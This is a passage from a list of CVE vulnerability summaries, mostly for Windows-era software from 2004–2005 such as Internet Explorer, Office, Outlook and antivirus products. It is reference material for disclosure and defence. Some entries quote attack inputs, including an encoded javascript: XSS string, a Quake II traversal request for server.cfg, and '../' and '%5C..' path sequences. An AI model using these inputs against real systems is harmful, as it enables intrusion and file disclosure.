cleared from the RPC cache. [CVE-2005-1791] Microsoft Internet Explorer 6 SP2 (6.0.2900.2180) crashes when the user attempts to add a URI to the restricted zone, in which the full domain name of the URI begins with numeric sequences similar to an IP address. NOTE: if there is not an exploit scenario in which an attacker can trigger this behavior, then perhaps this issue should not be included in CVE. [CVE-2005-1790] Microsoft Internet Explorer 6 SP2 6.0.2900.2180 and 6.0.2800.1106, and earlier versions, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a Javascript BODY onload event that calls the window function, aka "Mismatched Document Object Model Objects Memory Corruption Vulnerability." [CVE-2005-1766] Heap-based buffer overflow in rtffplin.cpp in RealPlayer 10.5 6.0.12.1056 on Windows, and 10, 10.0.1.436, and other versions before 10.0.5 on Linux, allows remote attackers to execute arbitrary code via a RealMedia file with a long RealText string, such as an SMIL file. [CVE-2005-1719] Unknown vulnerability in ALWIL avast! antivirus 4 (4.6.6230) and earlier, when running on Windows NT 4.0, does not properly detect certain viruses. [CVE-2005-1683] Buffer overflow in winword.exe 10.2627.6714 and earlier in Microsoft Word for the Macintosh, before SP3 for Word 2002, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted mcw file. [CVE-2005-1665] The __VIEWSTATE functionality in Microsoft ASP.NET 1.x, when not cryptographically signed, allows remote attackers to cause a denial of service (CPU consumption) via deeply nested markup. [CVE-2005-1664] The __VIEWSTATE functionality in Microsoft ASP.NET 1.x allows remote attackers to conduct replay attacks to (1) apply a ViewState generated from one view to a different view, (2) reuse ViewState information after the application's state has changed, or (3) use the ViewState to conduct attacks or expose content to third parties. [CVE-2005-1649] The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the "Land" vulnerability (CVE-1999-0016). [CVE-2005-1590] The Altiris Client Service for Windows (ACLIENT.EXE) 6.0.88 allows local users to disable password protection and access the administrative interface by finding and showing the "Altiris Client Service" hidden window, disabling the password protection, disabling the "Hide client tray icon box" option, then opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2004-2070. [CVE-2005-1576] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows uses the Content-Type HTTP header to determine the file type, but saves the original file extension when "Save to Disk" is selected, which allows remote attackers to hide the real file types of downloaded files. [CVE-2005-1575] The file download dialog in Mozilla Firefox 0.10.1 and 1.0 for Windows allows remote attackers to hide the real file types of downloaded files via the Content-Type HTTP header and a filename containing whitespace, dots, or ASCII byte 160. [CVE-2005-1574] Windows Media Player 9 and 10, in certain cases, allows content protected by Windows Media Digital Rights Management (WMDRM) to redirect the user to a web site to obtain a license, even when the "Acquire licenses automatically for protected content" setting is not enabled. [CVE-2005-1407] Skype for Windows 1.2.0.0 to 1.2.0.46 allows local users to bypass the identity check for an authorized application, then call arbitrary Skype API functions by modifying or replacing that application. [CVE-2005-1346] Multiple Symantec AntiVirus products, including Norton AntiVirus 2005 11.0.0, Web Security Web Security 3.0.1.72, Mail Security for SMTP 4.0.5.66, AntiVirus Scan Engine 4.3.7.27, SAV/Filter for Domino NT 3.1.1.87, and Mail Security for Exchange 4.5.4.743, when running on Windows, allows remote attackers to cause a denial of service (component crash) and avoid detection via a crafted RAR file. [CVE-2005-1286] Unquoted Windows search path vulnerability in BitDefender 8 allows local users to prevent BitDefender from starting by creating a malicious C:\program.exe, possibly due to the lack of quoting of the full pathname when executing a process. [CVE-2005-1272] Stack-based buffer overflow in the Backup Agent for Microsoft SQL Server in BrightStor ARCserve Backup Agent for SQL Server 11.0 allows remote attackers to execute arbitrary code via a long string sent to port (1) 6070 or (2) 6050. [CVE-2005-1216] Microsoft ISA Server 2000 allows remote attackers to connect to services utilizing the NetBIOS protocol via a NetBIOS connection with an ISA Server that uses the NetBIOS (all) predefined packet filter. [CVE-2005-1215] Microsoft ISA Server 2000 allows remote attackers to poison the ISA cache or bypass content restriction policies via a malformed HTTP request packet containing multiple Content-Length headers. [CVE-2005-1214] Microsoft Agent allows remote attackers to spoof trusted Internet content and execute arbitrary code by disguising security prompts on a malicious Web page. [CVE-2005-1213] Stack-based buffer overflow in the news reader for Microsoft Outlook Express (MSOE.DLL) 5.5 SP2, 6, and 6 SP1 allows remote malicious NNTP servers to execute arbitrary code via a LIST response with a long second field. [CVE-2005-1212] Buffer overflow in Microsoft Step-by-Step Interactive Training (orun32.exe) allows remote attackers to execute arbitrary code via a bookmark link file (.cbo, cbl, or .cbm extension) with a long User field. [CVE-2005-1211] Buffer overflow in the PNG image rendering component of Microsoft Internet Explorer allows remote attackers to execute arbitrary code via a crafted PNG file. [CVE-2005-1191] The Web View DLL (webvw.dll), as used in Windows Explorer on Windows 2000 systems, does not properly filter an apostrophe ("'") in the author name in a document, which allows attackers to execute arbitrary script via extra attributes when Web View constructs a mailto: link for the preview pane when the user selects the file. [CVE-2005-1185] Unquoted Windows search path vulnerability in Musicmatch Jukebox 10.00.2047 and earlier allows local users to gain privileges via a malicious C:\program.exe file, which is run by MMFWLaunch.exe when it attempts to execute launch.exe. [CVE-2005-1182] Unknown vulnerability in Incoming Remote Command (iSeries Access for Windows Remote Command service) in IBM OS/400 R510, R520, and R530 allows attackers to cause a denial of service (IRC shutdown) via certain inputs. [CVE-2005-1150] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier, when running on Windows systems, allows attackers to cause a denial of service (hang). [CVE-2005-1106] PictureViewer in QuickTime for Windows 6.5.2 allows remote attackers to cause a denial of service (application crash) via a GIF image with the maximum depth start value, possibly triggering an integer overflow. [CVE-2005-1052] Microsoft Outlook 2003 and Outlook Web Access (OWA) 2003 do not properly display comma separated addresses in the From field in an e-mail message, which could allow remote attackers to spoof e-mail addresses. [CVE-2005-1045] OpenText FirstClass 8.0 client does not properly sanitize strings before passing them to the Windows ShellExecute API, which allows remote attackers to execute arbitrary commands via a UNC path in a bookmark. [CVE-2005-0954] Windows Explorer and Internet Explorer in Windows 2000 SP1 allows remote attackers to cause a denial of service (CPU consumption) via a malformed Windows Metafile (WMF) file. [CVE-2005-0944] Unknown vulnerability in Microsoft Jet DB engine (msjet40.dll) 4.00.8618.0, related to insufficient data validation, allows remote attackers to execute arbitrary code via a crafted mdb file. [CVE-2005-0921] Microsoft Outlook 2002 Connector for IBM Lotus Domino 2.0 allows local users to save passwords and login credentials locally, even when password caching is disabled by a group policy. [CVE-2005-0904] Remote Desktop in Windows XP SP1 does not verify the "Force shutdown from a remote system" setting, which allows remote attackers to shut down the system by executing TSShutdn.exe. [CVE-2005-0871] calendar_scheduler.php in Topic Calendar 1.0.1 module for phpBB, when running on a Microsoft IIS server, allows remote attackers to obtain sensitive information via invalid parameters, which reveal the path in an error message. [CVE-2005-0820] Microsoft Office InfoPath 2003 SP1 includes sensitive information in the Manifest.xsf file in a custom .xsn form, which allows attackers to obtain printer and network information, obtain the database name, username, and password, or obtain the internal web server name. [CVE-2005-0803] The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability." [CVE-2005-0773] Stack-based buffer overflow in VERITAS Backup Exec Remote Agent 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for Netware allows remote attackers to execute arbitrary code via a CONNECT_CLIENT_AUTH request with authentication method type 3 (Windows credentials) and a long password argument. [CVE-2005-0772] VERITAS Backup Exec 9.0 through 10.0 for Windows Servers, and 9.0.4019 through 9.1.307 for Netware, allows remote attackers to cause a denial of service (Remote Agent crash) via (1) a crafted packet in NDMLSRVR.DLL or (2) a request packet with an invalid (non-0) "Error Status" value, which triggers a null dereference. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0738] Stack consumption vulnerability in Microsoft Exchange Server 2003 SP1 allows users to cause a denial of service (hang) by deleting or moving a folder with deeply nested subfolders, which causes Microsoft Exchange Information Store service (Store.exe) to hang as a result of a large number of recursive calls. [CVE-2005-0688] Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the "Land" vulnerability (CVE-1999-0016). [CVE-2005-0573] Gaim 1.1.3 on Windows systems allows remote attackers to cause a denial of service (client crash) via a file transfer in which the filename contains "(" or ")" (parenthesis) characters. [CVE-2005-0564] Stack-based buffer overflow in Microsoft Word 2000 and Word 2002, and Microsoft Works Suites 2000 through 2004, might allow remote attackers to execute arbitrary code via a .doc file with long font information. [CVE-2005-0563] Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("jav&#X41sc&#0010 [CVE-2005-0558] Buffer overflow in Microsoft Word 2000, Word 2002, and Word 2003 allows remote attackers to execute arbitrary code via a crafted document. [CVE-2005-0555] Buffer overflow in the Content Advisor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a crafted Content Advisor file, aka "Content Advisor Memory Corruption Vulnerability." [CVE-2005-0554] Buffer overflow in the URL processor of Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL with a long hostname, aka "URL Parsing Memory Corruption Vulnerability." [CVE-2005-0553] Race condition in the memory management routines in the DHTML object processor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail, aka "DHTML Object Memory Corruption Vulnerability". [CVE-2005-0500] Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to spoof the domain name of a URL in a titlebar for a script-initiated popup window, which could facilitate phishing attacks. [CVE-2005-0452] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft ASP.NET (.Net) 1.0 and 1.1 to SP1 allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<". [CVE-2005-0425] Unknown vulnerability in IBM Websphere Application Server 5.0, 5.1, and 6.0 when running on Windows, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via a crafted URL that causes the page to be processed by the file serving servlet instead of the JSP engine. [CVE-2005-0420] Microsoft Outlook Web Access (OWA), when used with Exchange, allows remote attackers to redirect users to arbitrary URLs for login via a link to the owalogon.asp application. [CVE-2005-0416] The Windows Animated Cursor (ANI) capability in Windows NT, Windows 2000 through SP4, Windows XP through SP1, and Windows 2003 allows remote attackers to execute arbitrary code via the AnimationHeaderBlock length field, which leads to a stack-based buffer overflow. [CVE-2005-0360] The Microsoft Log Sink Class ActiveX control in pkmcore.dll is marked as "safe for scripting" for Internet Explorer, which allows remote attackers to create or append to arbitrary files. [CVE-2005-0324] Infinite Mobile Delivery Webmail 2.6 allows remote attackers to gain sensitive information via an HTTP request that contains invalid characters for a Windows foldername, which reveals the path in an error message. [CVE-2005-0230] Firefox 1.0 does not prevent the user from dragging an executable file to the desktop when it has an image/gif content type but has a dangerous extension such as .bat or .exe, which allows remote attackers to bypass the intended restriction and execute arbitrary commands via malformed GIF files that can still be parsed by the Windows batch file parser, aka "firedragging." [CVE-2005-0148] Thunderbird before 0.9, when running on Windows systems, uses the default handler when processing javascript: links, which invokes Internet Explorer and may expose the Thunderbird user to vulnerabilities in the version of Internet Explorer that is installed on the user's system. NOTE: since the invocation between multiple products is a common practice, and the vulnerabilities inherent in multi-product interactions are not easily enumerable, this issue might be REJECTED in the future. [CVE-2005-0110] Internet Explorer 6 on Windows XP SP2 allows remote attackers to bypass the file download warning dialog and possibly trick an unknowledgeable user into executing arbitrary code via a web page with a body element containing an onclick tag, as demonstrated using the createElement function. [CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference. [CVE-2005-0057] The Hyperlink Object Library for Windows 98, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a crafted link that triggers an "unchecked buffer" in the library, possibly due to a buffer overflow. [CVE-2005-0051] The Server service (srvsvc.dll) in Windows XP SP1 and SP2 allows remote attackers to obtain sensitive information (users who are accessing resources) via an anonymous logon using a named pipe, which is not properly authenticated, aka the "Named Pipe Vulnerability." [CVE-2005-0050] The License Logging service for Windows NT Server, Windows 2000 Server, and Windows Server 2003 does not properly validate the length of messages, which leads to an "unchecked buffer" and allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code, aka the "License Logging Service Vulnerability." [CVE-2005-0049] Windows SharePoint Services and SharePoint Team Services for Windows Server 2003 does not properly validate an HTTP redirection query, which allows remote attackers to inject arbitrary HTML and web script via a cross-site scripting (XSS) attack, or to spoof the web cache. [CVE-2005-0047] Windows 2000, XP, and Server 2003 does not properly "validate the use of memory regions" for COM structured storage files, which allows attackers to execute arbitrary code, aka the "COM Structured Storage Vulnerability." [CVE-2005-0045] The Server Message Block (SMB) implementation for Windows NT 4.0, 2000, XP, and Server 2003 does not properly validate certain SMB packets, which allows remote attackers to execute arbitrary code via Transaction responses containing (1) Trans or (2) Trans2 commands, aka the "Server Message Block Vulnerability," and as demonstrated using Trans2 FIND_FIRST2 responses with large file name length fields. [CVE-2005-0044] The OLE component in Windows 98, 2000, XP, and Server 2003, and Exchange Server 5.0 through 2003, does not properly validate the lengths of messages for certain OLE data, which allows remote attackers to execute arbitrary code, aka the "Input Validation Vulnerability." [CVE-2004-2694] Microsoft Outlook Express 6.0 allows remote attackers to bypass intended access restrictions, load content from arbitrary sources into the Outlook context, and facilitate phishing attacks via a "BASE HREF" with the target set to "_top". [CVE-2004-2657] * DISPUTED Mozilla Firefox 1.5.0.1, and possibly other versions, preserves some records of user activity even after uninstalling, which allows local users who share a Windows profile to view the records after a new installation of Firefox, as reported for the list of Passwords Never Saved web sites. NOTE: The vendor has disputed this issue, stating that "The uninstaller is primarily there to uninstall the application. It is not there to uninstall user data. For the moment I will stick by my module-owner decision." [CVE-2004-2643] Directory traversal vulnerability in Microsoft cabarc allows remote attackers to overwrite files via "../" sequences in file names in a CAB archive. [CVE-2004-2635] An ActiveX control for McAfee Security Installer Control System 4.0.0.81 allows remote attackers to access the Windows registry via web pages that use the control's RegQueryValue() method. [CVE-2004-2628] Multiple directory traversal vulnerabilities in thttpd 2.07 beta 0.4, when running on Windows, allow remote attackers to read arbitrary files via a URL that contains (1) a hex-encoded backslash dot-dot sequence ("%5C..") or (2) a drive letter (such as "C:"). [CVE-2004-2609] The stuffit.com executable on Symantec PowerQuest DeployCenter 5.5 boot disks allows local users to obtain sensitive information (an unencrypted password for a Windows domain account) via four "stuffit /f:stuffit.dat" invocations, possibly due to a buffer overflow. [CVE-2004-2594] Absolute path traversal vulnerability in Quake II server before R1Q2 on Windows, as used in multiple products, allows remote attackers to read arbitrary files via a "\/" in a pathname argument, as demonstrated by "download \/server.cfg". [CVE-2004-2565] Multiple directory traversal vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, when the administrative IP address restrictions have been modified from the default, allow remote authenticated users to read arbitrary files via (1) a "..\" (dot dot backslash) in the file parameter to showini.asp, or (2) an absolute path with drive letter in the log parameter to showlog.asp. [CVE-2004-2564] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in show.asp and (2) the title parameter in showperf.asp. [CVE-2004-2555] Riverdeep FoolProof Security 3.9.x on Windows 98 and Windows ME uses weak cryptography (arithmetic and XOR operations) to relate the Control password to the Administrator password, which allows local users to calculate the Administrator password if they know the Control password and password recovery key. [CVE-2004-2482] Microsoft Outlook 2000 and 2003, when configured to use Microsoft Word 2000 or 2003 as the e-mail editor and when forwarding e-mail, does not properly handle an opening OBJECT tag that does not have a closing OBJECT tag, which causes Outlook to automatically download the URI in the data property of the OBJECT tag and might allow remote attackers to execute arbitrary code. [CVE-2004-2476] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (infinite loop and crash) via an IFRAME with "?" as the file source. [CVE-2004-2442] Multiple interpretation error in various F-Secure Anti-Virus products, including Workstation 5.43 and earlier, Windows Servers 5.50 and earlier, MIMEsweeper 5.50 and earlier, Anti-Virus for Linux Servers and Gateways 4.61 and earlier, and other products, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on the target system. [CVE-2004-2434] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (browser crash) via a link with "::{" (colon colon left brace), which triggers a null dereference when the user attempts to save the link using "Save As" and Internet Explorer prepares an error message with an attacker-controlled format string. [CVE-2004-2383] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario [CVE-2004-2382] The PerfectNav plugin for Microsoft Internet Explorer allows remote attackers to cause a denial of service (browser crash) via a malformed URL such as "?". [CVE-2004-2379] Multiple cross-site scripting (XSS) vulnerabilities in @Mail 3.64 for Windows allow remote attackers to inject arbitrary web script or HTML via (1) the Displayed Name attribute in util.pl and (2) the Folder attribute in showmail.pl. [CVE-2004-2378] @Mail 3.64 for Windows allows remote attackers to cause a denial of service ("unusable" server) via a large number of POP3 connections to the server. [CVE-2004-2296] The preview_review function in the Reviews module in PHP-Nuke 6.0 to 7.3, when running on Windows systems, allows remote attackers to obtain sensitive information via an invalid date parameter, which generates an error message. [CVE-2004-2276] F-Secure Anti-Virus 5.41 and 5.42 on Windows, Client Security 5.50 and 5.52, 4.60 for Samba Servers, and 4.52 and earlier for Linux does not properly detect certain viruses in a PKZip archive, which allows viruses such as Sober.D and Sober.G to bypass initial detection. [CVE-2004-2220] F-Secure Anti-Virus for Microsoft Exchange 6.30 and 6.31 does not properly detect certain password-protected files in a ZIP file, which allows remote attackers to bypass anti-virus protection. [CVE-2004-2219] Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar to facilitate phishing attacks via Javascript that uses an invalid URI, modifies the Location field, then uses history.back to navigate to the previous domain, aka NullyFake. [CVE-2004-2179] asycpict.dll, as used in Microsoft products such as Front Page 97 and 98, allows remote attackers to cause a denial of service (hang) via a JPEG image with maximum height and width values. [CVE-2004-2147] Unknown versions of Symantec Norton AntiVirus and Microsoft Outlook allow attackers to cause a denial of service (crash) via malformed e-mail messages (1) without a body or (2) without a carriage return ("\n") separating the headers from the body. [CVE-2004-2091] Microsoft Baseline Security Analyzer (MBSA) 1.2 does not correctly identify systems that have been patched but remain vulnerable to exploit until the system is rebooted, possibly giving the administrator a false sense of security. [CVE-2004-2090] Microsoft Internet Explorer 5.0.1 through 6.0 allows remote attackers to determine the existence of arbitrary files via the VBScript LoadPicture method, which returns an error code if the file does not exist. [CVE-2004-2070] The Altiris Client Service for Windows 5.6 SP1 Hotfix E (5.6.181) allows local users to execute arbitrary commands by opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2005-1590. [CVE-2004-2022] ActivePerl 5.8.x and others, and Larry Wall's Perl 5.6.1 and others, when running on Windows systems, allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the system command, which leads to a stack-based buffer overflow. NOTE: it is unclear whether this bug is in Perl or the OS API that is used by Perl. [CVE-2004-2005] Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name. [CVE-2004-1944] Eudora 6.1 and 6.0.3 for Windows allows remote attackers to cause a denial of service (crash) via a deeply nested multipart MIME message. [CVE-2004-1922] Microsoft Internet Explorer 5.5 and 6.0 allocates memory based on the memory size written in the BMP file instead of the actual BMP file size, which allows remote attackers to cause a denial of service (memory consumption) via a small BMP file with has a large memory size. [CVE-2004-1777] A "range check error" in Skype for Windows before 0.98.0.28 allows local and remote attackers to cause a denial of service (application crash) via long command line arguments or a long callto:// URL, a different vulnerability than CVE-2004-1114. [CVE-2004-1686] Internet Explorer 6.0 in Windows XP SP2 allows remote attackers to bypass the Information Bar prompt for ActiveX and Javascript via an XHTML page that contains an Internet Explorer formatted comment between the DOCTYPE tag and the HTML tag, as demonstrated using the DesignScience MathPlayer ActiveX plugin. [CVE-2004-1649] Buffer overflow in Microsoft Msinfo32.exe might allow local users to execute arbitrary code via a long filename in the msinfo_file command line parameter. NOTE: this issue might not cross security boundaries, so it may be REJECTED in the future. [CVE-2004-1623] The WAV file property handler in Windows XP SP1 allows remote attackers to cause a denial of service (infinite loop in Explorer) via a WAV file with an invalid file header whose fmt chunk length is set to 0xFFFFFFFF. [CVE-2004-1560] Microsoft SQL Server 7.0 allows remote attackers to cause a denial of service (mssqlserver service halt) via a long request to TCP port 1433, possibly triggering a buffer overflow. [CVE-2004-1527] Microsoft Internet Explorer 6.0 SP1 does not properly handle certain character strings in the Path attribute, which can cause it to modify cookies in other domains when the attacker's domain name is within the target's domain name or when wildcard DNS is being used, which allows remote attackers to hijack web sessions. [CVE-2004-1481] Integer overflow in pnen3260.dll in RealPlayer 8 through 10.5 (6.0.12.1040) and earlier, and RealOne Player 1 or 2 on Windows or Mac OS, allows remote attackers to execute arbitrary code via a SMIL file and a .rm movie file with a large length field for the data chunk, which leads to a heap-based buffer overflow. [CVE-2004-1380] Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows and facilitate phishing attacks, aka the "Dialog Box Spoofing Vulnerability." [CVE-2004-1376] Directory traversal vulnerability in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote malicious FTP servers to overwrite arbitrary files via .. (dot dot) sequences in filenames returned from a LIST command. [CVE-2004-1361] Integer underflow in winhlp32.exe in Windows NT, Windows 2000 through SP4, Windows XP through SP2, and Windows 2003 allows remote attackers to execute arbitrary code via a malformed .hlp file, which leads to a heap-based buffer overflow. [CVE-2004-1331] The execCommand method in Microsoft Internet Explorer 6.0 SP2 allows remote attackers to bypass the "File Download - Security Warning" dialog and save arbitrary files with arbitrary extensions via the SaveAs command. [CVE-2004-1322] Cisco Unity 2.x, 3.x, and 4.x, when integrated with Microsoft Exchange, has several hard coded usernames and passwords, which allows remote attackers to gain unauthorized access and change configuration settings or read outgoing or incoming e-mail messages. [CVE-2004-1317] Stack-based buffer overflow in doexec.c in Netcat for Windows 1.1, when running with the -e option, allows remote attackers to execute arbitrary code via a long DNS command. [CVE-2004-1312] A bug in the HTML parser in a certain Microsoft HTML library, as used in various third party products, may allow remote attackers to cause a denial of service via certain strings, as reported in GFI MailEssentials for Exchange 9 and 10, and GFI MailSecurity for Exchange 8, which causes emails to remain in IIS or Exchange mail queues. [CVE-2004-1306] Heap-based buffer overflow in winhlp32.exe in Windows NT, Windows 2000 through SP4, Windows XP through SP2, and Windows 2003 allows remote attackers to execute arbitrary code via a crafted .hlp file. [CVE-2004-1305] The Windows Animated Cursor (ANI) capability in Windows NT, Windows 2000 through SP4, Windows XP through SP1, and Windows 2003 allow remote attackers to cause a denial of service via (1) the frame number set to zero, which causes an invalid memory address to be used and leads to a kernel crash, or (2) the rate number set to zero, which leads to resource exhaustion and hang. [CVE-2004-1244] Windows Media Player 9 allows remote attackers to execute arbitrary code via a PNG file containing large (1) width or (2) height values, aka the "PNG Processing Vulnerability." [CVE-2004-1198] Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash from memory consumption), as demonstrated using Javascript code that continuously creates nested arrays and then sorts the newly created arrays. [CVE-2004-1166] CRLF injection vulnerability in Microsoft Internet Explorer 6.0.2800.1106 and earlier allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") before the FTP command, which causes the commands to be inserted into the resulting FTP session, as demonstrated using a PORT command. [CVE-2004-1155] Internet Explorer 5.01 through 6 allows remote attackers to spoof arbitrary web sites by injecting content from one window into another window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. NOTE: later research shows that Internet Explorer 7 on Windows XP SP2 is also vulnerable. [CVE-2004-1134] Buffer overflow in the Microsoft W3Who ISAPI (w3who.dll) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long query string. [CVE-2004-1133] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft W3Who ISAPI (w3who.dll) allow remote attackers to inject arbitrary HTML and web script via (1) HTTP headers such as "Connection" or (2) invalid parameters whose values are echoed in the resulting error message. [CVE-2004-1122] Safari 1.x to 1.2.4, and possibly other versions, allows inactive windows to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows, aka the "Dialog Box Spoofing Vulnerability," a different vulnerability than CVE-2004-1314. [CVE-2004-1104] Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty "href" attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. [CVE-2004-1099] Cisco Secure Access Control Server for Windows (ACS Windows) and Cisco Secure Access Control Server Solution Engine (ACS Solution Engine) 3.3.1, when the EAP-TLS protocol is enabled, does not properly handle expired or untrusted certificates, which allows remote attackers to bypass authentication and gain unauthorized access via a "cryptographically correct" certificate with valid fields such as the username. [CVE-2004-1043] Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to execute arbitrary code by using the "Related Topics" command in the Help ActiveX Control (hhctrl.ocx) to open a Help popup window containing the PCHealth tools.htm file in the local zone and injecting Javascript to be executed, as demonstrated using "writehta.txt" and the ADODB recordset, which saves a .HTA file to the local system, aka the "HTML Help ActiveX control Cross Domain Vulnerability." [CVE-2004-1038] A design error in the IEEE1394 specification allows attackers with physical access to a device to read and write to sensitive memory using a modified FireWire/IEEE 1394 client, thus bypassing intended restrictions that would normally require greater degrees of physical access to exploit. NOTE: this was reported in 2008 to affect Windows Vista, but some Linux-based operating systems have protection mechanisms against this attack. [CVE-2004-1023] Kerio Winroute Firewall before 6.0.9, ServerFirewall before 1.0.1, and MailServer before 6.0.5, when installed on Windows based systems, do not modify the ACLs for critical files, which allows local users with Power Users privileges to modify programs, install malicious DLLs in the plug-ins folder, and modify XML files related to configuration. [CVE-2004-0988] Integer overflow on Apple QuickTime before 6.5.2, when running on Windows systems, allows remote attackers to cause a denial of service (memory consumption) via certain inputs that cause a large memory operation. [CVE-2004-0985] Internet Explorer 6.x on Windows XP SP2 allows remote attackers to execute arbitrary code, as demonstrated using a document with a draggable file type such as .xml, .doc, .py, .cdf, .css, .pdf, or .ppt, and using ADODB.Connection and ADODB.recordset to write to a .hta file that is interpreted in the Local Zone by HTML Help. [CVE-2004-0979] Internet Explorer on Windows XP does not properly modify the "Drag and Drop or copy and paste files" setting when the user sets it to "Disable" or "Prompt," which may enable security-sensitive operations that are inconsistent with the user's intended configuration. [CVE-2004-0964] Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file. [CVE-2004-0963] Buffer overflow in Microsoft Word 2002 (10.6612.6714) SP3, and possibly other versions, allows remote attackers to cause a denial of service (application exception) and possibly execute arbitrary code in winword.exe via certain unexpected values in a .doc file, including (1) an offset that triggers an out-of-bounds memory access, (2) a certain value that causes a large memory copy as triggered by an integer conversion error, and other values. [CVE-2004-0937] Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. [CVE-2004-0928] The Microsoft IIS Connector in JRun 4.0 and Macromedia ColdFusion MX 6.0, 6.1, and 6.1 J2EE allows remote attackers to bypass authentication and view source files, such as .asp, .pl, and .php files, via an HTTP request that ends in " [CVE-2004-0894] LSASS (Local Security Authority Subsystem Service) of Windows 2000 Server and Windows Server 2003 does not properly validate connection information, which allows local users to gain privileges via a specially-designed program. [CVE-2004-0893] The Local Procedure Call (LPC) interface of the Windows Kernel for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the lengths of messages sent to the LPC port, which allows local users to gain privileges, aka "Windows Kernel Vulnerability." [CVE-2004-0892] Microsoft Proxy Server 2.0 and Microsoft ISA Server 2000 (which is included in Small Business Server 2000 and Small Business Server 2003 Premium Edition) allows remote attackers to spoof trusted Internet content on a specially crafted webpage via spoofed reverse DNS lookup results. [CVE-2004-0848] Buffer overflow in Microsoft Office XP allows remote attackers to execute arbitrary code via a link with a URL file location containing long inputs after (1) "%00 (null byte) in .doc filenames or (2) "%0a" (carriage return) in .rtf filenames. [CVE-2004-0847] The Microsoft .NET forms authentication capability for ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." [CVE-2004-0846] Unknown vulnerability in Microsoft Excel 2000, 2002, 2001 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via a malicious file containing certain parameters that are not properly validated. [CVE-2004-0839] Internet Explorer in Windows XP SP2, and other versions including 5.01 